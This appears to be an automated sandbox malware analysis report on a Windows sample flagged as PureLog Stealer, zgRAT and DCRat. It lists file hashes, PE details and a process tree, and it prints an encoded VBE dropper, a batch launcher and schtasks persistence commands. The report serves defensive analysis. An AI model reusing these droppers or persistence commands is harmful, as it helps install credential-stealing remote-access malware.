<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.926903916656514
Encrypted:	false
SSDEEP:	48:6cJ7PtcjM7Jt8Bs3FJsdcV4MKe27PvqBHeOulajfqXSfbNtm:/PlPc+Vx9MPvk4cjRzNt
MD5:	C005D03A3E046E0859ABEF8FBB48D0F5
SHA1:	76D2CB790487EA109D5B8559754E86F0C35A8D31
SHA-256:	BAB24907C17008135E65D3735A2C1CCD15C503161CDD8897A667BC508648F507
SHA-512:	5912D3590BE64448FF0196831790EFACF27D0654A3F51D72F9C1BD878324E4FE8E7B4D9CA2A4964653368149FA4CC467633B30935A9C9583AD19DCF765DFC77C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....9mg.............................'... ...@....@.. ....................................@.................................<'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

C:\portcomSurrogateRefSession\2c4060b21d7ea7

Download File

Process:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
File Type:	ASCII text, with very long lines (682), with no line terminators
Category:	dropped
Size (bytes):	682
Entropy (8bit):	5.887468886019827
Encrypted:	false
SSDEEP:	12:FSTEG/CEGVvKr1CZtdmtNNlihbn+zHvAxE+z0kLUCQPi34r8vywA5LEHVj:FgEGtGVo8ZqtHOn+zPAJLUW34rgHA5Li
MD5:	91EFC7DACB57C805D29F07EA3E8849D4
SHA1:	F1A4D913260CDFAF478E6076050EB5D6E4FF0074
SHA-256:	3EB793011C178EB28D9209DFB8E0DFF5C440D77047B2E7F351B65444DD79C97F
SHA-512:	5E24AAA4B3899B8A0591360DE10D0B36B785BB1E8B7632CBE3DC781E8D872887F4CEFDE1317B167620FB2762FBC55D848C120C041CF8EDB4A1571F95975A9154
Malicious:	false
Preview:	nM5gNnsfDQqVwJKosICQUvIxv4GW5RkS6mgQkyN2upzeihSAIObDfjW2EHuTgVjvpXZJn4D45Jgo5nOOmGNqzhxXQnMcD4WYFDzKIIWOLhHVDr6a3grZI25IkB39rk0BxHj2yDFdt9fSZbTjrvjgN6QMIrkGPXgkqGh5HElzbNqIXnsIrUS5BUx10WtHd8OWc5lT4XbmKtF9QHzf8bY4FkiWSqFuUeWc9TqcBYOU2pvRPylshOIBjTR1WOANSqRpXmA6bXdkNECZyRHeFWNGVV3pCyFwXBBLYG4mxoRJviyeR1CFHgI5dLTCtV3mRqMMD0BsWeqaFDUxhYXLvAp12FsMw23cuo2EWlbbzTtmzr0Z0gfV7s0RBUT7Hz6dlOpbLPb566VcRCBLPSWPXifCxlDBSeTAXPBkBYOkFjYBWY98SIrzdqFCtnojMZncmUEBAaJ1DvKyJepYlFsKwehqJ81YuoYp65YBU78180vrfR2P7P8HrdqHxY2BjvGYXf1NFnEoH0L6t0K2FlbeqR8dPRO5F6SNtWUAZpKTLTA0RtY7N957UmrFhY8yYIjKi8MWfKcabHSXRHMg3RsFAU2HoOcBqW4DuzSShBbChefNTUyZLb5HZdJNGFsRsatFMPmbz4810qigzpxTaC0PaxoRpEMbTKUGuaAEsWkRdDRt4n

C:\portcomSurrogateRefSession\ComwebDriverbroker.exe

Download File

Process:	C:\Users\user\Desktop\4t8f8F3uT1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1790464
Entropy (8bit):	7.485066925729337
Encrypted:	false
SSDEEP:	24576:Gr9jPHLY0g5fcMpx/mWJXZiz9sFMY5EXzn+O8sU1ISTbhpIcN2RN+fgiPM8whrPU:czLYJTFoK4XznW2ElpI9RXich7h
MD5:	E741574F3B1602BA40508C8EE4E8CD26
SHA1:	4E833F7742AB4A26EDDB60A87EFE74DFC0A849DB
SHA-256:	CA4F177F6257475CE968EF0028C585F038C36CF799BAFC9F08E0519F6D154533
SHA-512:	EF70F73FB3A53CBEB99FE163EC98DCC85D95E4002B579776FF03D87CE767BF87AB412C339CA2065310AC1CAFCB0D126F8E54F2AB1616D977BDC37A331B6F8FCE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2ag.................J..........Nh... ........@.. ....................................@..................................h..K....... ............................................................................ ............... ..H............text...TH... ...J.................. ..`.rsrc... ............L..............@....reloc...............P..............@..B................0h......H.......D...................[...tg.......................................0..........(.... ........8........E........M...N...)...8....(.... ....~y...{....9....& ....8....(.... ....~y...{....:....& ....8....(.... ....~y...{j...:....& ....8y......0.......... ........8........E....z...5...................k...8u...r...ps....z8.... ....~y...{....:....& ....8....~....(M... .... .... ....s....~....(Q....... ....8t...8.... ....8e......... ....~y...{....9K...& ....8@...~....9.... ...

C:\portcomSurrogateRefSession\QCNKuiZnAzlCwEFS5hObRT3t8.vbe

Download File

Process:	C:\Users\user\Desktop\4t8f8F3uT1.exe
File Type:	data
Category:	dropped
Size (bytes):	218
Entropy (8bit):	5.843249245635735
Encrypted:	false
SSDEEP:	6:GUwqK+NkLzWbHa/818nZNDd3RL1wQJRAvpcskLUw9sPgs:GlMCzWLaG4d3XBJGvpct9sIs
MD5:	FDF0B8ACBBD5567157C5EF848504A27A
SHA1:	8520758A35B127C35177791763E0997BAFAA75EE
SHA-256:	F3F667FB780A226FA190B026A9630FD322F859AC9B4FE3CD6226A038F92630FD
SHA-512:	E842B4E9C8E4A77143F6A6D99AB4B8AE497E79093D16757AA0DC0372AF24D6528FEEC2C193F4CB6CFD725C3454A7EE5A63A914AEBD4AA9C9F998092D77328945
Malicious:	false
Preview:	#@~^wQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJwGMY1W:UEM.WTlO+"+Wj.//bGxJz4RX$}o!"v^t4[ZR8lDE~,!S~6lVdnyj0AAA==^#~@.

C:\portcomSurrogateRefSession\b85BZX0R6chhd0.bat

Download File

Process:	C:\Users\user\Desktop\4t8f8F3uT1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	99
Entropy (8bit):	5.088261417753464
Encrypted:	false
SSDEEP:	3:ysCvLF7AfTq3R9CHAEVKXg6TC4A3mxL95bqb4E:yjvLFE7gR9CHAbTTClmN6d
MD5:	7CB6B8AE16464823376D12D51D4EA6DA
SHA1:	82695EF4C42D2B49A1A6103750F97A5F7F193976
SHA-256:	6CE7162D60786533DA437EB3D0FCFE0BEF962E59F5023CFC1BA75943E7F9BB46
SHA-512:	EF8CB25B4584B4FC2780B3782034C262CC024E706FE6C46E3419296E3F63A2DDB59669BEF195E320D619E3A9B4773D2D719D884B8BF5C243314E4D0B0A2BA440
Malicious:	false
Preview:	%rCFPgJnHZrjf%%alvTIdfXFshS%..%cgXb%"C:\portcomSurrogateRefSession/ComwebDriverbroker.exe"%wQJkbiL%

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.608377343060015
Encrypted:	false
SSDEEP:	12:PP5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:ZdUOAokItULVDv
MD5:	773F4517CEF147380FEE136A4E7475F8
SHA1:	8F7DC0493D8CB50A29905AA27BC6F988789DCC15
SHA-256:	7AC6D96475C08F7037282C9ECDB1A8AA6153D9D784CC1BE316B9CCDCA62B60B0
SHA-512:	88CBBAA6F9549F272A41AEFBC79A1182C136B57147644A81A10D0B698EB4EC4A9DB7A492C166602577E19D399BE642A973ED5EDFAC850647B525FEB7EF9065EF
Malicious:	false
Preview:	..Pinging 301389 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.426683882070985
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	4t8f8F3uT1.exe
File size:	2'112'237 bytes
MD5:	5e8c152d54c2160cd8226d744e30560a
SHA1:	44c3c3ad115e2fb4d5749c0500e614854e200379
SHA256:	cab653c942101a8462ef207a31f9335fbcc5cf39bde3efac40f07f1c67a89a1c
SHA512:	fcb9bf80b674b11507f0555073f756aa9c5b7fff565839bdbd89d5630239ecf0afd619b77889378cd09f92925b3eee1129ea519eb4a0d7753d600c27690f8a1b
SSDEEP:	24576:2TbBv5rUyXV2r9jPHLY0g5fcMpx/mWJXZiz9sFMY5EXzn+O8sU1ISTbhpIcN2RNO:IBJszLYJTFoK4XznW2ElpI9RXich7hc
TLSH:	B3A5AE16B5D14E32C2601735966B0A3E5390E7633612EF8F3A0F1196AD57BF18B722E3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007FCC588C61CBh
jmp 00007FCC588C5ADDh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FCC588B8927h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007FCC588C8F6Fh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FCC588C5C6Ch
push 0000000Ch
push esi
call 00007FCC588C5229h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FCC588B88A2h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FCC588C8A29h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FCC588C5BE8h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FCC588C8A0Ch
int3
jmp 00007FCC588CA4A7h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0xdff8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x72000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0xdff8	0xe000	ba08fbcd0ed7d9e6a268d75148d9914b	False	0.6373639787946429	data	6.638661032196024	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x72000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x65198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x66cb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x67558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x68400	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x68868	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x69910	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6beb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x70588	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x70358	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x70498	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x70228	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6fef0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6fc98	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x70f68	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x71150	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x71320	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x714d8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x71620	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x71a90	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x71bf8	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x71d50	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x71e60	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x71f20	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x6fc30	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x70810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	04:22:05
Start date:	26/12/2024
Path:	C:\Users\user\Desktop\4t8f8F3uT1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\4t8f8F3uT1.exe"
Imagebase:	0x690000
File size:	2'112'237 bytes
MD5 hash:	5E8C152D54C2160CD8226D744E30560A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2136314831.0000000004A6D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2135696001.0000000006212000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:22:05
Start date:	26/12/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Imagebase:	0x7ff642ec0000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:22:05
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\portcomSurrogateRefSession\QCNKuiZnAzlCwEFS5hObRT3t8.vbe"
Imagebase:	0xa0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:22:07
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\portcomSurrogateRefSession\b85BZX0R6chhd0.bat" "
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:22:07
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:22:07
Start date:	26/12/2024
Path:	C:\portcomSurrogateRefSession\ComwebDriverbroker.exe
Wow64 process (32bit):	false
Commandline:	"C:\portcomSurrogateRefSession/ComwebDriverbroker.exe"
Imagebase:	0xf90000
File size:	1'790'464 bytes
MD5 hash:	E741574F3B1602BA40508C8EE4E8CD26
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2276882335.0000000013574000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2158339900.0000000000F92000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\portcomSurrogateRefSession\ComwebDriverbroker.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	04:22:10
Start date:	26/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Pictures\smss.exe'" /f
Imagebase:	0x7ff724c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:22:10
Start date:	26/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Default\Pictures\smss.exe'" /rl HIGHEST /f
Imagebase:	0x7ff724c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	04:22:10
Start date:	26/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Pictures\smss.exe'" /rl HIGHEST /f
Imagebase:	0x7ff724c80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:22:10
Start date:	26/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wt3mav0l\wt3mav0l.cmdline"
Imagebase:	0x7ff746ad0000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:22:10
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	04:22:11
Start date:	26/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAB2D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC5F50EFF8B17D43B99D465AE8464D9.TMP"
Imagebase:	0x7ff72ff30000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:22:11
Start date:	26/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wkjjwbdv\wkjjwbdv.cmdline"
Imagebase:	0x7ff746ad0000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	04:22:11
Start date:	26/12/2024
